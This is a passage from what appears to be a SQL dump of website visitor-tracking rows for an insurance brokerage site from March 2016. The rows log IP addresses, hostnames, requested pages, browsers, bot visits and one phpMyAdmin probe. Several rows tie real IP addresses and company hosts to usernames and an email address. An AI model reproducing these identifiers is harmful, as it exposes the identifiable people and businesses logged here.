(KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10062,'0b_daaaa3b222d4465f49726ae636147b8a','1459270169','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10064,'0b_daaaa3b222d4465f49726ae636147b8a','1459270182','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10065,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459270205','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10067,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459270220','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10068,'0b_19b7d88b23b3ce0f719a91b5ac5dd32c','1459270403','50.74.240.14','mail.kentco.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10071,'0b_5fec56360118108daf22c3403cb33a79','1459270458','50.74.240.14','mail.kentco.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(10074,'0b_5fec56360118108daf22c3403cb33a79','1459270465','50.74.240.14','mail.kentco.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(10076,'0b_2c98d95b1e34214c6811c6713befe8a0','1459270679','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10079,'0b_fbc31c7b981dbeff8a45eadf3c7e3bf7','1459270931','173.220.42.74','sbs.vanguardcoverage.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(10082,'0b_fbc31c7b981dbeff8a45eadf3c7e3bf7','1459270933','173.220.42.74','sbs.vanguardcoverage.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10083,'0b_7f424c89c8f73da6670ce4f0247acc81','1459271651','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(10085,'0b_5fec56360118108daf22c3403cb33a79','1459271764','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(10086,'0b_5fec56360118108daf22c3403cb33a79','1459271765','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(10088,'0b_5fec56360118108daf22c3403cb33a79','1459272044','50.74.240.14','mail.kentco.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(10089,'0b_d813c9f85ea36faedfce4a35e20a6720','1459272415','94.23.35.10','ns368492.ip-94-23-35.eu','/','Python-urllib/2.7','','',0,'','','eu','','','Python-urllib','','','','0','0',0),(10092,'0b_686caa5a3a54936eec99708e376971bd','1459272699','207.97.167.53','207.97.167.53','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 48','us','','Google','','','','','0','0',0),(10094,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459272716','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10095,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459272718','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10097,'0b_686caa5a3a54936eec99708e376971bd','1459272710','207.97.167.53','207.97.167.53','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 48','us','','','','','','','0','0',0),(10100,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459272722','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10103,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459272803','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10104,'0b_32bd9dc0d7525e57bf7049c4e2adad60','1459273747','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10107,'0b_32bd9dc0d7525e57bf7049c4e2adad60','1459273749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10110,'0b_4444103fbb5b7d18961b8d099daeb575','1459273815','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10112,'0b_9732e2f2a532ece2b43e16b64c677ea8','1459274579','198.144.151.114','gasses.tnmail45.pw','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','pw','','','','','','','0','0',0),(10113,'0b_2284301ca54cb46dfe06905afc70791d','1459274573','192.3.151.133','192.3.151.133','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(10115,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459274759','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10118,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459274759','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(10119,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459274763','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10121,'0b_48a2fb80ec7ba77319d3aaf2b5b15c72','1459274770','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10122,'0b_deada75107e74864d00d88524585258f','1459275141','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10124,'0b_b5fc17dfc885bb28eab72d6ecfe026c7','1459275291','198.167.168.70','198.167.168.70.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(10125,'0b_b5fc17dfc885bb28eab72d6ecfe026c7','1459275294','198.167.168.70','198.167.168.70.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(10128,'0b_b5fc17dfc885bb28eab72d6ecfe026c7','1459275310','198.167.168.70','198.167.168.70.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(10131,'0b_dcaff40372883167052c094dda8ba216','1459275680','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10133,'0b_b83b833f324a24417a02073286a643ba','1459276951','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10136,'0b_c6fac19691a4103878b4afb836e7296a','1459277060','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10137,'0b_5e5b0a31464319cf216f5f2b9c62b8cd','1459277075','65.55.210.233','msnbot-65-55-210-233.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(10139,'0b_abbc5cee4422f62412a43f74e469bcd4','1459277875','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(10140,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279269','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10143,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279270','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10145,'0b_cdc5ce99d90d4906172287c0f8306180','1459279323','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10146,'0b_cdc5ce99d90d4906172287c0f8306180','1459279324','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10149,'0b_cdc5ce99d90d4906172287c0f8306180','1459279336','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10152,'0b_cdc5ce99d90d4906172287c0f8306180','1459279453','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(10155,'0b_cdc5ce99d90d4906172287c0f8306180','1459279454','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','0',0),(10158,'0b_cdc5ce99d90d4906172287c0f8306180','1459279464','108.58.88.178','ool-6c3a58b2.static.optonline.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(10160,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279514','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10163,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279515','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10166,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279521','108.58.88.178','ool-6c3a58b2.static.optonline.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10167,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279526','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(10170,'0b_2f90f29df2a821de40684c4dbc4ea8e4','1459279529','108.58.88.178','ool-6c3a58b2.static.optonline.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(10173,'0b_5869c7c9a753b80b06662586305969f0','1459279746','38.105.236.253','38.105.236.253','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(10175,'0b_5869c7c9a753b80b06662586305969f0','1459279776','38.105.236.253','38.105.236.253','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10176,'0b_5869c7c9a753b80b06662586305969f0','1459279817','38.105.236.253','38.105.236.253','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10178,'0b_5869c7c9a753b80b06662586305969f0','1459279818','38.105.236.253','38.105.236.253','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10181,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459280022','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10184,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459280033','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10185,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459280070','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10187,'0b_1725f96219de7453eb9fe8ad2ddc5e8f','1459280086','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10190,'0b_4cdad765f2024d3cfde2f2ed6cf89255','1459280129','198.167.168.70','198.167.168.70.xchangetele.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','Jschwinder','','0','0',0),(10191,'0b_4cdad765f2024d3cfde2f2ed6cf89255','1459280217','198.167.168.70','198.167.168.70.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','Jschwinder','','0','51',0),(10193,'0b_4cdad765f2024d3cfde2f2ed6cf89255','1459280226','198.167.168.70','198.167.168.70.xchangetele.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','Jschwinder','','0','51',0),(10194,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280690','94.22.47.242','f498.ip12.netikka.fi','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10196,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280694','94.22.47.242','f498.ip12.netikka.fi','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10197,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280695','94.22.47.242','f498.ip12.netikka.fi','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10199,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280700','94.22.47.242','f498.ip12.netikka.fi','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10200,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280706','94.22.47.242','f498.ip12.netikka.fi','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10203,'0b_916ecc47b559d576c15dfb49e2116bc2','1459280710','94.22.47.242','f498.ip12.netikka.fi','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fi','','','MJ12bot','','','','0','0',0),(10206,'0b_7b2c85343de53e00c38936f445101500','1459280895','67.80.209.15','ool-4350d10f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjSyJDx1ObLAhXK6xQKHez_Dg4QFggqMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.117868183,d.dmo','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10208,'0b_7b2c85343de53e00c38936f445101500','1459280898','67.80.209.15','ool-4350d10f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10209,'0b_797d00101db7635a769eccba97835536','1459281218','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10212,'0b_7f424c89c8f73da6670ce4f0247acc81','1459281490','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(10215,'0b_bde57a38963bbfad1a96457b2a451915','1459282257','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(10218,'0b_4df98f27adab62e186b38bbd29212a63','1459283716','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10220,'0b_4df98f27adab62e186b38bbd29212a63','1459283718','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10223,'0b_6bdc0ffd3d2dddf82c8d36cb0cc93182','1459284155','80.255.192.237','80.255.192.237','/phpmyadmin/index.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','0','0',0),(10226,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285044','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiW8Jyx5ObLAhXHOiYKHSUoBl8QFggqMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.117868183,d.eWE','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','0',0),(10229,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285047','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','0',0),(10230,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285056','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','0',0),(10233,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285169','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','169',0),(10236,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285170','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','51',0),(10239,'0b_a0d53c7f3f9f6eb488ac99dcb76ef28f','1459285227','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','3','51',0),(10242,'0b_2c249f7dd7de39cf3d58be19985bde34','1459285411','108.58.88.178','ool-6c3a58b2.static.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 